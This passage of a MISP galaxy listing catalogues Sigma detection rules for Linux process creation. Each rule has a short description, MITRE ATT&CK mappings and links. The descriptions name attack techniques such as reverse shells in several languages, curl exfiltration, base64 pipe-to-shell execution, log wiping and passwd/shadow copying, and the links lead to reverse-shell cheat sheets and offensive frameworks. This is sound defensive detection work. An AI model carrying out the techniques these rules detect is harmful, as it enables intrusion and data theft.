  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 11590. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml

Linux Recon Indicators

Detects events with patterns found in commands used for reconnaissance on linux systems

The tag is: misp-galaxy:sigma-rules="Linux Recon Indicators"

Linux Recon Indicators has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11591. Table References

Links

https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml

Linux HackTool Execution

Detects known hacktool execution based on image name.

The tag is: misp-galaxy:sigma-rules="Linux HackTool Execution"

Linux HackTool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"

Table 11592. Table References

Links

https://github.com/t3l3machus/Villain

https://github.com/Pennyw0rth/NetExec/

https://github.com/pathtofile/bad-bpf

https://github.com/Gui774ume/ebpfkit

https://github.com/carlospolop/PEASS-ng

https://github.com/t3l3machus/hoaxshell

https://github.com/1N3/Sn1per

https://github.com/Ne0nd0g/merlin

https://github.com/HavocFramework/Havoc

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml

Chmod Suspicious Directory

Detects chmod targeting files in abnormal directory paths.

The tag is: misp-galaxy:sigma-rules="Chmod Suspicious Directory"

Chmod Suspicious Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 11593. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md

https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml

Python Spawning Pretty TTY

Detects python spawning a pretty tty which could be indicative of potential reverse shell activity

The tag is: misp-galaxy:sigma-rules="Python Spawning Pretty TTY"

Python Spawning Pretty TTY has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11594. Table References

Links

https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml

Flush Iptables Ufw Chain

Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic

The tag is: misp-galaxy:sigma-rules="Flush Iptables Ufw Chain"

Flush Iptables Ufw Chain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11595. Table References

Links

https://blogs.blackberry.com/

https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml

Potential Perl Reverse Shell Execution

Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity

The tag is: misp-galaxy:sigma-rules="Potential Perl Reverse Shell Execution"

Table 11596. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml

Atlassian Confluence CVE-2022-26134

Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134

The tag is: misp-galaxy:sigma-rules="Atlassian Confluence CVE-2022-26134"

Atlassian Confluence CVE-2022-26134 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11597. Table References

Links

https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml

Potential Xterm Reverse Shell

Detects usage of "xterm" as a potential reverse shell tunnel

The tag is: misp-galaxy:sigma-rules="Potential Xterm Reverse Shell"

Potential Xterm Reverse Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11598. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml

Suspicious Curl File Upload - Linux

Detects a suspicious curl process start the adds a file to a web request

The tag is: misp-galaxy:sigma-rules="Suspicious Curl File Upload - Linux"

Suspicious Curl File Upload - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11599. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file

https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76

https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

https://curl.se/docs/manpage.html

https://twitter.com/d1r4c/status/1279042657508081664

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml

Potential Ruby Reverse Shell

Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell

The tag is: misp-galaxy:sigma-rules="Potential Ruby Reverse Shell"

Table 11600. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml

Apt GTFOBin Abuse - Linux

Detects usage of "apt" and "apt-get" as a GTFOBin to execute and proxy command and binary execution

The tag is: misp-galaxy:sigma-rules="Apt GTFOBin Abuse - Linux"

Apt GTFOBin Abuse - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11601. Table References

Links

https://gtfobins.github.io/gtfobins/apt-get/

https://gtfobins.github.io/gtfobins/apt/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml

User Has Been Deleted Via Userdel

Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks

The tag is: misp-galaxy:sigma-rules="User Has Been Deleted Via Userdel"

User Has Been Deleted Via Userdel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11602. Table References

Links

https://www.cyberciti.biz/faq/linux-remove-user-command/

https://linuxize.com/post/how-to-delete-group-in-linux/

https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/

https://linux.die.net/man/8/userdel

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml

System Information Discovery

Detects system information discovery commands

The tag is: misp-galaxy:sigma-rules="System Information Discovery"

System Information Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11603. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml

Linux Network Service Scanning Tools Execution

Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.

The tag is: misp-galaxy:sigma-rules="Linux Network Service Scanning Tools Execution"

Linux Network Service Scanning Tools Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 11604. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md

https://github.com/Tib3rius/AutoRecon

https://github.com/projectdiscovery/naabu

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml

Linux Crypto Mining Indicators

Detects command line parameters or strings often used by crypto miners

The tag is: misp-galaxy:sigma-rules="Linux Crypto Mining Indicators"

Linux Crypto Mining Indicators has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 11605. Table References

Links

https://www.poolwatch.io/coin/monero

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml

Terminate Linux Process Via Kill

Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.

The tag is: misp-galaxy:sigma-rules="Terminate Linux Process Via Kill"

Terminate Linux Process Via Kill has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 11606. Table References

Links

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

https://www.cyberciti.biz/faq/how-force-kill-process-linux/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_kill_process.yml

DD File Overwrite

Detects potential overwriting and deletion of a file using DD.

The tag is: misp-galaxy:sigma-rules="DD File Overwrite"

DD File Overwrite has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11607. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml

Suspicious Package Installed - Linux

Detects installation of suspicious packages using system installation utilities

The tag is: misp-galaxy:sigma-rules="Suspicious Package Installed - Linux"

Suspicious Package Installed - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 11609. Table References

Links

https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml

Scheduled Cron Task/Job - Linux

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

The tag is: misp-galaxy:sigma-rules="Scheduled Cron Task/Job - Linux"

Scheduled Cron Task/Job - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11610. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml

System Network Connections Discovery - Linux

Detects usage of system utilities to discover system network connections

The tag is: misp-galaxy:sigma-rules="System Network Connections Discovery - Linux"

System Network Connections Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 11611. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml

Ufw Force Stop Using Ufw-Init

Detects attempts to force stop the ufw using ufw-init

The tag is: misp-galaxy:sigma-rules="Ufw Force Stop Using Ufw-Init"

Ufw Force Stop Using Ufw-Init has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11614. Table References

Links

https://blogs.blackberry.com/

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml

System Network Discovery - Linux

Detects enumeration of local network configuration

The tag is: misp-galaxy:sigma-rules="System Network Discovery - Linux"

System Network Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 11615. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml

Suspicious Curl Change User Agents - Linux

Detects a suspicious curl process start on linux with set useragent options

The tag is: misp-galaxy:sigma-rules="Suspicious Curl Change User Agents - Linux"

Suspicious Curl Change User Agents - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11616. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml

Potential Python Reverse Shell

Detects executing python with keywords related to network activity that could indicate a potential reverse shell

The tag is: misp-galaxy:sigma-rules="Potential Python Reverse Shell"

Table 11617. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml

Linux Webshell Indicators

Detects suspicious sub processes of web server processes

The tag is: misp-galaxy:sigma-rules="Linux Webshell Indicators"

Linux Webshell Indicators has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11618. Table References

Links

https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/

https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml

Scheduled Task/Job At

Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code

The tag is: misp-galaxy:sigma-rules="Scheduled Task/Job At"

Scheduled Task/Job At has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 11619. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml

Print History File Contents

Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance

The tag is: misp-galaxy:sigma-rules="Print History File Contents"

Print History File Contents has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"

Table 11620. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md

https://github.com/sleventyeleven/linuxprivchecker/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml

Crontab Enumeration

Detects usage of crontab to list the tasks of the user

The tag is: misp-galaxy:sigma-rules="Crontab Enumeration"

Crontab Enumeration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11621. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml

BPFtrace Unsafe Option Usage

Detects the usage of the unsafe bpftrace option

The tag is: misp-galaxy:sigma-rules="BPFtrace Unsafe Option Usage"

BPFtrace Unsafe Option Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11622. Table References

Links

https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/

https://bpftrace.org/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml

Potential PHP Reverse Shell

Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.

The tag is: misp-galaxy:sigma-rules="Potential PHP Reverse Shell"

Table 11623. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml

OMIGOD SCX RunAsProvider ExecuteScript

Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

The tag is: misp-galaxy:sigma-rules="OMIGOD SCX RunAsProvider ExecuteScript"

OMIGOD SCX RunAsProvider ExecuteScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 11624. Table References

Links

https://github.com/Azure/Azure-Sentinel/pull/3059

https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml

Linux Base64 Encoded Pipe to Shell

Detects suspicious process command line that uses base64 encoded input for execution with a shell

The tag is: misp-galaxy:sigma-rules="Linux Base64 Encoded Pipe to Shell"

Linux Base64 Encoded Pipe to Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11625. Table References

Links

https://github.com/arget13/DDexec

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml

Clear Linux Logs

Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

The tag is: misp-galaxy:sigma-rules="Clear Linux Logs"

Clear Linux Logs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

Table 11626. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml

Group Has Been Deleted Via Groupdel

Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks

The tag is: misp-galaxy:sigma-rules="Group Has Been Deleted Via Groupdel"

Group Has Been Deleted Via Groupdel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11627. Table References

Links

https://www.cyberciti.biz/faq/linux-remove-user-command/

https://linuxize.com/post/how-to-delete-group-in-linux/

https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/

https://linux.die.net/man/8/groupdel

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml

Linux Base64 Encoded Shebang In CLI

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

The tag is: misp-galaxy:sigma-rules="Linux Base64 Encoded Shebang In CLI"

Linux Base64 Encoded Shebang In CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11628. Table References

Links

https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml

Capabilities Discovery - Linux

Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.

The tag is: misp-galaxy:sigma-rules="Capabilities Discovery - Linux"

Capabilities Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11629. Table References

Links

https://github.com/diego-treitos/linux-smart-enumeration

https://github.com/carlospolop/PEASS-ng

https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml

Linux Shell Pipe to Shell

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

The tag is: misp-galaxy:sigma-rules="Linux Shell Pipe to Shell"

Linux Shell Pipe to Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11630. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml

Curl Usage on Linux

Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server

The tag is: misp-galaxy:sigma-rules="Curl Usage on Linux"

Curl Usage on Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11631. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml

ESXi System Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.

The tag is: misp-galaxy:sigma-rules="ESXi System Information Discovery Via ESXCLI"

ESXi System Information Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11632. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml

Potential Linux Process Code Injection Via DD Utility

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

The tag is: misp-galaxy:sigma-rules="Potential Linux Process Code Injection Via DD Utility"

Potential Linux Process Code Injection Via DD Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proc Memory - T1055.009" with estimative-language:likelihood-probability="almost-certain"

Table 11633. Table References

Links

https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh

https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml

Touch Suspicious Service File

Detects usage of the "touch" process in service file.

The tag is: misp-galaxy:sigma-rules="Touch Suspicious Service File"

Touch Suspicious Service File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 11634. Table References

Links

https://blogs.blackberry.com/

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml

ESXi Syslog Configuration Change Via ESXCLI

Detects changes to the ESXi syslog configuration via "esxcli"

The tag is: misp-galaxy:sigma-rules="ESXi Syslog Configuration Change Via ESXCLI"

ESXi Syslog Configuration Change Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003" with estimative-language:likelihood-probability="almost-certain"

Table 11635. Table References

Links

https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml

Copy Passwd Or Shadow From TMP Path

Detects when the file "passwd" or "shadow" is copied from tmp path

The tag is: misp-galaxy:sigma-rules="Copy Passwd Or Shadow From TMP Path"

Copy Passwd Or Shadow From TMP Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11637. Table References

Links

https://blogs.blackberry.com/

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml

Disable Or Stop Services

Detects the usage of utilities such as 'systemctl', 'service'…​etc to stop or disable tools and services

The tag is: misp-galaxy:sigma-rules="Disable Or Stop Services"

Table 11638. Table References

Links

https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml

ESXi VM List Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

The tag is: misp-galaxy:sigma-rules="ESXi VM List Discovery Via ESXCLI"

ESXi VM List Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11639. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html

https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html

https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml

Commands to Clear or Remove the Syslog

Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks

The tag is: misp-galaxy:sigma-rules="Commands to Clear or Remove the Syslog"

Commands to Clear or Remove the Syslog has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

Table 11640. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml

